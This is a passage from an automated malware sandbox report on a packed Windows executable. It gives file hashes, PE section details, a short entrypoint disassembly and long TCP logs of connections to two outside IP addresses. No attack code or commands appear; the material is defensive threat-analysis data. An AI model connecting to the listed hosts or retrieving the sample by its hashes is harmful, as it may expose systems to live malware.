                                                    5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    No created / dropped files found

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Entropy (8bit):7.9863148053447715
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • VXD Driver (31/22) 0.00%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:s8kPMNXOZY.exe
                                                    File size:4'500'992 bytes
                                                    MD5:fbba61c61fa706eec44a022a1e9e3bac
                                                    SHA1:74e5e5e2ad5dfba941f35c8e207cad219b9ad21d
                                                    SHA256:085ebe5916195a08c768e279650cdaa09b11b8ceda0fad4b9a499a4a3267b461
                                                    SHA512:75d98196ee6fdf28b074ca8a2e17d27c7b3eaa187bd0f92fb02391090974ac649d450e14c0238cebb8c629884d3f3e2c9737888deaa12dbe12187fbf03e57e72
                                                    SSDEEP:98304:cNLH9lv77mJ/g1Ef/DPJWUUz+TE88fc9vv43AYRSjasy1UtAxa:uL/zypmo4UeuYfcy3+DtUa
                                                    TLSH:642633E625FF0BB3C225AF302CE68F76DB2AB9538FB7251392909475D41080761D978E
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@..................................zE...@... ............................

                                                    File Icon

                                                    Icon Hash:90cececece8e8eb0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x1039000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                    DLL Characteristics:DYNAMIC_BASE
                                                    Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                    Authenticode Signature

                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp 00007F6FA0D2F1BAh
                                                        jl 00007F6FA0D2F1FAh
                                                        add byte ptr [eax], al
                                                        jmp 00007F6FA0D311B5h
                                                        add byte ptr [0000000Ah], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], dh
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add bh, bh
                                                        inc dword ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [0000000Ah], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], 00000000h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add eax, 0000000Ah
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc374b40x10njaplbck
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc374640x18njaplbck
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        0x10000x6db0000x288a00a1091bcbd9b258524fe8ec18a7a1b859unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x6dc0000x1ac0x200022e8ee5fe0ba5d3308572c401d694adFalse0.5859375data4.587885049980031IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        0x6de0000x39b0000x200053ea0e3f85490f8b31b60720b2f6b23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        njaplbck0xa790000x1bf0000x1be800d5b40eb0bed8da8c22280b0b769e4a98False0.9943981619190929data7.955985417488292IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        rewyqdml0xc380000x10000x40078f79b775c517af12a65eb296e687392False0.77734375data6.03322133003277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .taggant0xc390000x30000x2200f352ea1b2a7929a71b5a20ff677b2a8fFalse0.06215533088235294DOS executable (COM)0.7545454457783044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_MANIFEST0xc374c40x152ASCII text, with CRLF line terminators0.6479289940828402

                                                        Imports

                                                        DLLImport
                                                        kernel32.dlllstrcpy

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 28, 2024 09:35:27.646632910 CET49704443192.168.2.1034.226.108.155
                                                        Dec 28, 2024 09:35:27.646670103 CET4434970434.226.108.155192.168.2.10
                                                        Dec 28, 2024 09:35:27.646763086 CET49704443192.168.2.1034.226.108.155
                                                        Dec 28, 2024 09:35:27.741580963 CET49704443192.168.2.1034.226.108.155
                                                        Dec 28, 2024 09:35:27.741601944 CET4434970434.226.108.155192.168.2.10
                                                        Dec 28, 2024 09:35:29.604635000 CET4434970434.226.108.155192.168.2.10
                                                        Dec 28, 2024 09:35:29.605349064 CET49704443192.168.2.1034.226.108.155
                                                        Dec 28, 2024 09:35:29.605367899 CET4434970434.226.108.155192.168.2.10
                                                        Dec 28, 2024 09:35:29.606832981 CET4434970434.226.108.155192.168.2.10
                                                        Dec 28, 2024 09:35:29.606929064 CET49704443192.168.2.1034.226.108.155
                                                        Dec 28, 2024 09:35:29.608544111 CET49704443192.168.2.1034.226.108.155
                                                        Dec 28, 2024 09:35:29.608633995 CET4434970434.226.108.155192.168.2.10
                                                        Dec 28, 2024 09:35:29.608731031 CET49704443192.168.2.1034.226.108.155
                                                        Dec 28, 2024 09:35:29.608741045 CET4434970434.226.108.155192.168.2.10
                                                        Dec 28, 2024 09:35:29.660526037 CET49704443192.168.2.1034.226.108.155
                                                        Dec 28, 2024 09:35:29.946906090 CET4434970434.226.108.155192.168.2.10
                                                        Dec 28, 2024 09:35:29.947067022 CET4434970434.226.108.155192.168.2.10
                                                        Dec 28, 2024 09:35:29.947149992 CET49704443192.168.2.1034.226.108.155
                                                        Dec 28, 2024 09:35:29.956684113 CET49704443192.168.2.1034.226.108.155
                                                        Dec 28, 2024 09:35:29.956702948 CET4434970434.226.108.155192.168.2.10
                                                        Dec 28, 2024 09:35:32.368048906 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.487601995 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.487854004 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.489356995 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.608973026 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.608997107 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.609101057 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.609119892 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.609177113 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.609186888 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.609199047 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.609241009 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.609256983 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.609296083 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.609358072 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.609359980 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.609430075 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.609446049 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.609448910 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.609474897 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.609493971 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.728790998 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.728820086 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.728864908 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.728869915 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.728898048 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.728926897 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.728945017 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.728981018 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.728996992 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.729049921 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.729068041 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.729103088 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.775537014 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.775662899 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.895366907 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.895427942 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:32.935667038 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:32.935806036 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.055402040 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.055505991 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.215698957 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.215833902 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.419572115 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.419610977 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.554397106 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.554538012 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.554616928 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.674263954 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674292088 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674335957 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.674369097 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674412012 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674417973 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.674472094 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.674491882 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674531937 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674640894 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674660921 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674678087 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.674702883 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.674767017 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674777031 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674845934 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.674870014 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674885988 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.674917936 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.674954891 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.675080061 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675112963 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675129890 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.675153971 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.675194025 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675241947 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675329924 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675388098 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675487995 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675607920 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675671101 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675775051 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675811052 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675898075 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.675977945 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.676048040 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.676064014 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.676094055 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.676121950 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.676167965 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.676218987 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.676250935 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.676292896 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.676301003 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.676336050 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.676371098 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.676429033 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.676456928 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.676496029 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.723632097 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.723793030 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.794054985 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794128895 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794142008 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794157028 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.794213057 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.794244051 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794307947 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794413090 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794473886 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794506073 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794641018 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794707060 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794768095 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794805050 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794919968 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.794930935 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795008898 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795018911 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795126915 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795137882 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795187950 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795454025 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.795622110 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795675039 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795700073 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.795773029 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795798063 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795804977 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.795830011 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.795831919 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795874119 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.795876980 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795927048 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795938015 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.795953989 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.795981884 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.795996904 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.796066046 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796077967 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796112061 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.796122074 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796127081 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.796169996 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796221972 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796247959 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796350002 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796379089 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796555996 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796607018 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796679020 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796689034 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796716928 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796726942 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796735048 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796745062 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796844006 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796854973 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796916962 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.796926022 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797025919 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797050953 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797091961 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797157049 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797223091 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797254086 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797316074 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797425032 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797435045 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797445059 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797502041 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797517061 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797614098 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797625065 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797704935 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797714949 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797805071 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797815084 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.797873974 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.843439102 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.859076977 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.859181881 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.859266043 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.859602928 CET4971580192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:33.913748026 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.913772106 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.913826942 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.913836956 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.913938999 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.913949013 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.914896011 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915069103 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915079117 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915134907 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915167093 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915199041 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915266991 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915338039 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915397882 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915432930 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915478945 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915612936 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915640116 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915679932 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915718079 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915795088 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915851116 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915926933 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.915936947 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916011095 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916021109 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916080952 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916186094 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916194916 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916203976 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916315079 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916325092 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916408062 CET804971581.29.149.125192.168.2.10
